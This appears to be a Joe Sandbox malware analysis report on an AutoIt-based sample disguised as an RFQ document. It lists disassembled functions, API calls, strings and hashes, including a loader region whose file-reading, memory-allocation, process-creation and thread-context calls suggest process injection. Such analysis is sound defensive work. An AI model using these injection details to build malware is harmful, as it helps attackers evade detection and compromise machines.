                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 000E4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001A62F8,?,000E37C0,?), ref: 000E4882
                                                • Part of subcall function 0010074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000E72C5), ref: 00100771
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000E7308
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0011ECF1
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0011ED32
                                              • RegCloseKey.ADVAPI32(?), ref: 0011ED70
                                              • _wcscat.LIBCMT ref: 0011EDC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: c962dc5984a6069da0f51a17cfa2b006e6fb01b47d1d4316f15f5c3d79fa792c
                                              • Instruction ID: 4299de53d5f33fd2322ce11baa6b60d526c6aa698035eb9a94a012c239e6da25
                                              • Opcode Fuzzy Hash: c962dc5984a6069da0f51a17cfa2b006e6fb01b47d1d4316f15f5c3d79fa792c
                                              • Instruction Fuzzy Hash: 2571807150D3419EC714EFA5EC81AABBBE8FF99340F44482EF485D31A1EB709A89CB51
                                              Function 000E3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 000E3A62
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 000E3A71
                                              • LoadIconW.USER32(00000063), ref: 000E3A88
                                              • LoadIconW.USER32(000000A4), ref: 000E3A9A
                                              • LoadIconW.USER32(000000A2), ref: 000E3AAC
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000E3AD2
                                              • RegisterClassExW.USER32(?), ref: 000E3B28
                                                • Part of subcall function 000E3041: GetSysColorBrush.USER32(0000000F), ref: 000E3074
                                                • Part of subcall function 000E3041: RegisterClassExW.USER32(00000030), ref: 000E309E
                                                • Part of subcall function 000E3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E30AF
                                                • Part of subcall function 000E3041: InitCommonControlsEx.COMCTL32(?), ref: 000E30CC
                                                • Part of subcall function 000E3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000E30DC
                                                • Part of subcall function 000E3041: LoadIconW.USER32(000000A9), ref: 000E30F2
                                                • Part of subcall function 000E3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000E3101
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 2c6b9a57900d57bda61e4147097255dc774f03d9b0de7320e7bb4ec526707fda
                                              • Instruction ID: aca9fde89973b7fc3bcb0a3febfc2b1c0770d9e752b951e7c41531a50f407dc9
                                              • Opcode Fuzzy Hash: 2c6b9a57900d57bda61e4147097255dc774f03d9b0de7320e7bb4ec526707fda
                                              • Instruction Fuzzy Hash: BA213B71E00308AFEB109FA5EC09BAD7FB4FB09711F04412AF504A76A0D7BA5694DF94
                                              Function 000E3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 767 e3633-e3681 769 e3683-e3686 767->769 770 e36e1-e36e3 767->770 771 e3688-e368f 769->771 772 e36e7 769->772 770->769 773 e36e5 770->773 774 e375d-e3765 PostQuitMessage 771->774 775 e3695-e369a 771->775 777 e36ed-e36f0 772->777 778 11d31c-11d34a call f11d0 call f11f3 772->778 776 e36ca-e36d2 DefWindowProcW 773->776 783 e3711-e3713 774->783 779 11d38f-11d3a3 call 142a16 775->779 780 e36a0-e36a2 775->780 782 e36d8-e36de 776->782 784 e3715-e373c SetTimer RegisterWindowMessageW 777->784 785 e36f2-e36f3 777->785 813 11d34f-11d356 778->813 779->783 805 11d3a9 779->805 786 e36a8-e36ad 780->786 787 e3767-e3776 call e4531 780->787 783->782 784->783 788 e373e-e3749 CreatePopupMenu 784->788 791 e36f9-e370c KillTimer call e44cb call e3114 785->791 792 11d2bf-11d2c2 785->792 793 11d374-11d37b 786->793 794 e36b3-e36b8 786->794 787->783 788->783 791->783 798 11d2c4-11d2c6 792->798 799 11d2f8-11d317 MoveWindow 792->799 793->776 802 11d381-11d38a call 13817e 793->802 803 e36be-e36c4 794->803 804 e374b-e375b call e45df 794->804 808 11d2e7-11d2f3 SetFocus 798->808 809 11d2c8-11d2cb 798->809 799->783 802->776 803->776 803->813 804->783 805->776 808->783 809->803 814 11d2d1-11d2e2 call f11d0 809->814 813->776 818 11d35c-11d36f call e44cb call e43db 813->818 814->783 818->776
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 000E36D2
                                              • KillTimer.USER32(?,00000001), ref: 000E36FC
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000E371F
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000E372A
                                              • CreatePopupMenu.USER32 ref: 000E373E
                                              • PostQuitMessage.USER32(00000000), ref: 000E375F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: a38c88d40cfa0564b926e9d4b66293c7d467de6256b61854789200deffd7d0d4
                                              • Instruction ID: c99d110591699b54d43819efeed162bd892b8ba94dc0e90e02bcab123d6001e4
                                              • Opcode Fuzzy Hash: a38c88d40cfa0564b926e9d4b66293c7d467de6256b61854789200deffd7d0d4
                                              • Instruction Fuzzy Hash: 644105B2204285AFDF345F75EC4DBBD3B99EB01300F180129F552F76A2CBA59E919361
                                              Function 000E3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                              • API String ID: 1825951767-3513169116
                                              • Opcode ID: c1389f01ee10e33132bc2b51cf9cdc9c87c71d82bbf3ee01511ddf8253551105
                                              • Instruction ID: cedf65b41f6a76548ee278ab390cef41ff32a31bd874c71c6dcc77d25277e3a3
                                              • Opcode Fuzzy Hash: c1389f01ee10e33132bc2b51cf9cdc9c87c71d82bbf3ee01511ddf8253551105
                                              • Instruction Fuzzy Hash: 57A15F719102A99ECF14EFA2DC95EEEBB78BF14300F44042AF416B7192EF745A09CB60
                                              Function 00EF2610 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 942 ef2610-ef26be call ef0000 945 ef26c5-ef26eb call ef3520 CreateFileW 942->945 948 ef26ed 945->948 949 ef26f2-ef2702 945->949 950 ef283d-ef2841 948->950 954 ef2709-ef2723 VirtualAlloc 949->954 955 ef2704 949->955 951 ef2883-ef2886 950->951 952 ef2843-ef2847 950->952 956 ef2889-ef2890 951->956 957 ef2849-ef284c 952->957 958 ef2853-ef2857 952->958 959 ef272a-ef2741 ReadFile 954->959 960 ef2725 954->960 955->950 961 ef28e5-ef28fa 956->961 962 ef2892-ef289d 956->962 957->958 963 ef2859-ef2863 958->963 964 ef2867-ef286b 958->964 967 ef2748-ef2788 VirtualAlloc 959->967 968 ef2743 959->968 960->950 971 ef28fc-ef2907 VirtualFree 961->971 972 ef290a-ef2912 961->972 969 ef289f 962->969 970 ef28a1-ef28ad 962->970 963->964 965 ef286d-ef2877 964->965 966 ef287b 964->966 965->966 966->951 973 ef278f-ef27aa call ef3770 967->973 974 ef278a 967->974 968->950 969->961 975 ef28af-ef28bf 970->975 976 ef28c1-ef28cd 970->976 971->972 982 ef27b5-ef27bf 973->982 974->950 978 ef28e3 975->978 979 ef28cf-ef28d8 976->979 980 ef28da-ef28e0 976->980 978->956 979->978 980->978 983 ef27f2-ef2806 call ef3580 982->983 984 ef27c1-ef27f0 call ef3770 982->984 989 ef280a-ef280e 983->989 990 ef2808 983->990 984->982 992 ef281a-ef281e 989->992 993 ef2810-ef2814 FindCloseChangeNotification 989->993 990->950 994 ef282e-ef2837 992->994 995 ef2820-ef282b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EF26E1
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EF2907
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateFileFreeVirtual
                                              • String ID:
                                              • API String ID: 204039940-0
                                              • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                              • Instruction ID: d21fc584869b892cce38d4e352c56bbac3af04bebeca10b399a0ff90f8f323ec
                                              • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                              • Instruction Fuzzy Hash: F6A1E474E0020DEBDB18DFE4C895BEEBBB5BF48304F209159E605BB280D7799A41DB94
                                              Function 000E39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1073 e39e7-e3a57 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000E3A15
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000E3A36
                                              • ShowWindow.USER32(00000000,?,?), ref: 000E3A4A
                                              • ShowWindow.USER32(00000000,?,?), ref: 000E3A53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 3f6639e06b4cae9ac05b3052246ab1487f8d11c9541fcabc2b17483df4ac9c9c
                                              • Instruction ID: 61205e86c103a44ae6f587e743bc93a285b16183d2037fc0a6fb31d412384cfd
                                              • Opcode Fuzzy Hash: 3f6639e06b4cae9ac05b3052246ab1487f8d11c9541fcabc2b17483df4ac9c9c
                                              • Instruction Fuzzy Hash: 6DF0DA716412907EEA315B277C49F6B3E7DD7C7F50F04412EB904A2570C6A51891DAB0
                                              Function 00EF23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1074 ef23b0-ef2512 call ef0000 call ef22a0 CreateFileW 1081 ef2519-ef2529 1074->1081 1082 ef2514 1074->1082 1085 ef252b 1081->1085 1086 ef2530-ef254a VirtualAlloc 1081->1086 1083 ef25c9-ef25ce 1082->1083 1085->1083 1087 ef254e-ef2565 ReadFile 1086->1087 1088 ef254c 1086->1088 1089 ef2569-ef25a3 call ef22e0 call ef12a0 1087->1089 1090 ef2567 1087->1090 1088->1083 1095 ef25bf-ef25c7 ExitProcess 1089->1095 1096 ef25a5-ef25ba call ef2330 1089->1096 1090->1083 1095->1083 1096->1095
                                              APIs
                                                • Part of subcall function 00EF22A0: Sleep.KERNELBASE(000001F4), ref: 00EF22B1
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EF2508
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: 70T4CLEGPX9JEIWJNYK5AI2
                                              • API String ID: 2694422964-3916617480
                                              • Opcode ID: 28e137903d0d60fa8573a4094b0d420b9d30e4a25843faaea1f994ef03fb4c33
                                              • Instruction ID: 35627523f36e3904b9d1ab36f235d5e6b6de6eedee5389075169d0ddbff8cb14
                                              • Opcode Fuzzy Hash: 28e137903d0d60fa8573a4094b0d420b9d30e4a25843faaea1f994ef03fb4c33
                                              • Instruction Fuzzy Hash: EE616030D1428CDAEF11DBE4D854BEEBB75AF14304F144199E248BB2C1D7BA1B45CBA6
                                              Function 000E410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1098 e410d-e4123 1099 e4129-e413e call e7b76 1098->1099 1100 e4200-e4204 1098->1100 1103 e4144-e4164 call e7d2c 1099->1103 1104 11d5dd-11d5ec LoadStringW 1099->1104 1107 11d5f7-11d60f call e7c8e call e7143 1103->1107 1108 e416a-e416e 1103->1108 1104->1107 1117 e417e-e41fb call 103020 call e463e call 102ffc Shell_NotifyIconW call e5a64 1107->1117 1120 11d615-11d633 call e7e0b call e7143 call e7e0b 1107->1120 1110 e4174-e4179 call e7c8e 1108->1110 1111 e4205-e420e call e81a7 1108->1111 1110->1117 1111->1117 1117->1100 1120->1117
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0011D5EC
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              • _memset.LIBCMT ref: 000E418D
                                              • _wcscpy.LIBCMT ref: 000E41E1
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000E41F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                              • String ID: Line:
                                              • API String ID: 3942752672-1585850449
                                              • Opcode ID: 8f3b03e9bc2feb3f19525975aeda3d1c14308910644da8b53fba01ec8e675422
                                              • Instruction ID: c7712846b63627a2e451fea736a14cc7ec00d3f7c680642fb03fb5a1715aff04
                                              • Opcode Fuzzy Hash: 8f3b03e9bc2feb3f19525975aeda3d1c14308910644da8b53fba01ec8e675422
                                              • Instruction Fuzzy Hash: D331D171008384AED765EB61DC46FDB77ECAF55300F14451FF198A20A2EBB4A688C793
                                              Function 0010564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1133 10564d-105666 1134 105683 1133->1134 1135 105668-10566d 1133->1135 1136 105685-10568b 1134->1136 1135->1134 1137 10566f-105671 1135->1137 1138 105673-105678 call 108d68 1137->1138 1139 10568c-105691 1137->1139 1147 10567e call 108ff6 1138->1147 1140 105693-10569d 1139->1140 1141 10569f-1056a3 1139->1141 1140->1141 1143 1056c3-1056d2 1140->1143 1144 1056b3-1056b5 1141->1144 1145 1056a5-1056b0 call 103020 1141->1145 1150 1056d4-1056d7 1143->1150 1151 1056d9 1143->1151 1144->1138 1149 1056b7-1056c1 1144->1149 1145->1144 1147->1134 1149->1138 1149->1143 1154 1056de-1056e3 1150->1154 1151->1154 1155 1056e9-1056f0 1154->1155 1156 1057cc-1057cf 1154->1156 1157 105731-105733 1155->1157 1158 1056f2-1056fa 1155->1158 1156->1136 1160 105735-105737 1157->1160 1161 10579d-10579e call 110df7 1157->1161 1158->1157 1159 1056fc 1158->1159 1162 105702-105704 1159->1162 1163 1057fa 1159->1163 1164 105739-105741 1160->1164 1165 10575b-105766 1160->1165 1174 1057a3-1057a7 1161->1174 1169 105706-105708 1162->1169 1170 10570b-105710 1162->1170 1171 1057fe-105807 1163->1171 1172 105751-105755 1164->1172 1173 105743-10574f 1164->1173 1167 105768 1165->1167 1168 10576a-10576d 1165->1168 1167->1168 1175 1057d4-1057d8 1168->1175 1176 10576f-10577b call 104916 call 1110ab 1168->1176 1169->1170 1170->1175 1177 105716-10572f call 110f18 1170->1177 1171->1136 1178 105757-105759 1172->1178 1173->1178 1174->1171 1179 1057a9-1057ae 1174->1179 1180 1057ea-1057f5 call 108d68 1175->1180 1181 1057da-1057e7 call 103020 1175->1181 1194 105780-105785 1176->1194 1193 105792-10579b 1177->1193 1178->1168 1179->1175 1184 1057b0-1057c1 1179->1184 1180->1147 1181->1180 1189 1057c4-1057c6 1184->1189 1189->1155 1189->1156 1193->1189 1195 10578b-10578e 1194->1195 1196 10580c-105810 1194->1196 1195->1163 1197 105790 1195->1197 1196->1171 1197->1193
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                              • Instruction ID: eec88c57e5d02432dcf6fb073d66cf68e003885f7bfc4c512df087787920a584
                                              • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                              • Instruction Fuzzy Hash: 1451B470A00B05DBDB289FA9C88066F77B7AF54320FA48729F8A5962D0D7F19D50AF50
                                              Function 000E69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001A62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000E4F6F
                                              • _free.LIBCMT ref: 0011E68C
                                              • _free.LIBCMT ref: 0011E6D3
                                                • Part of subcall function 000E6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000E6D0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                              • API String ID: 2861923089-1757145024
                                              • Opcode ID: 6e4e0d9ff4da3e58db9f221894e95fd7d0aa65ac3495eb5ca3d5098818c09b21
                                              • Instruction ID: 9a0113792a8b5731efa5025d3aa09a5f405a613c2f168fde21400f29b6130840
                                              • Opcode Fuzzy Hash: 6e4e0d9ff4da3e58db9f221894e95fd7d0aa65ac3495eb5ca3d5098818c09b21
                                              • Instruction Fuzzy Hash: F0916D71910259EFCF08EFA5CC919EDB7B5FF18314F544429F815AB2A2EB309945CB50
                                              Function 000E35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000E35A1,SwapMouseButtons,00000004,?), ref: 000E35D4
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000E35A1,SwapMouseButtons,00000004,?,?,?,?,000E2754), ref: 000E35F5
                                              • RegCloseKey.KERNELBASE(00000000,?,?,000E35A1,SwapMouseButtons,00000004,?,?,?,?,000E2754), ref: 000E3617
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: c102b8cfc0746ca8ea9f067875cc55ca1e43a95d00aa44003bf16717233ec83f
                                              • Instruction ID: f2128f2d13224a70eb9aa9ecd48776e88d676272fdfb628610047c2d92b60829
                                              • Opcode Fuzzy Hash: c102b8cfc0746ca8ea9f067875cc55ca1e43a95d00aa44003bf16717233ec83f
                                              • Instruction Fuzzy Hash: 29115A75511248BFDB20CFA5EC48DAFBBB9EF05740F018469F805E7220D2719F419760
                                              Function 00EF12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00EF1A5B
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF1AF1
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF1B13
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                              • Instruction ID: 221cbff894ef2bd3aff2aa246d77a21dcc3c91c4a784477faf4e0a09bb031c93
                                              • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                              • Instruction Fuzzy Hash: 1C62FC30A1465CDBEB24CFA4C851BEEB371EF58304F1091A9D20DEB294E7759E81CB59
                                              Function 001497E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E5045: _fseek.LIBCMT ref: 000E505D
                                                • Part of subcall function 001499BE: _wcscmp.LIBCMT ref: 00149AAE
                                                • Part of subcall function 001499BE: _wcscmp.LIBCMT ref: 00149AC1
                                              • _free.LIBCMT ref: 0014992C
                                              • _free.LIBCMT ref: 00149933
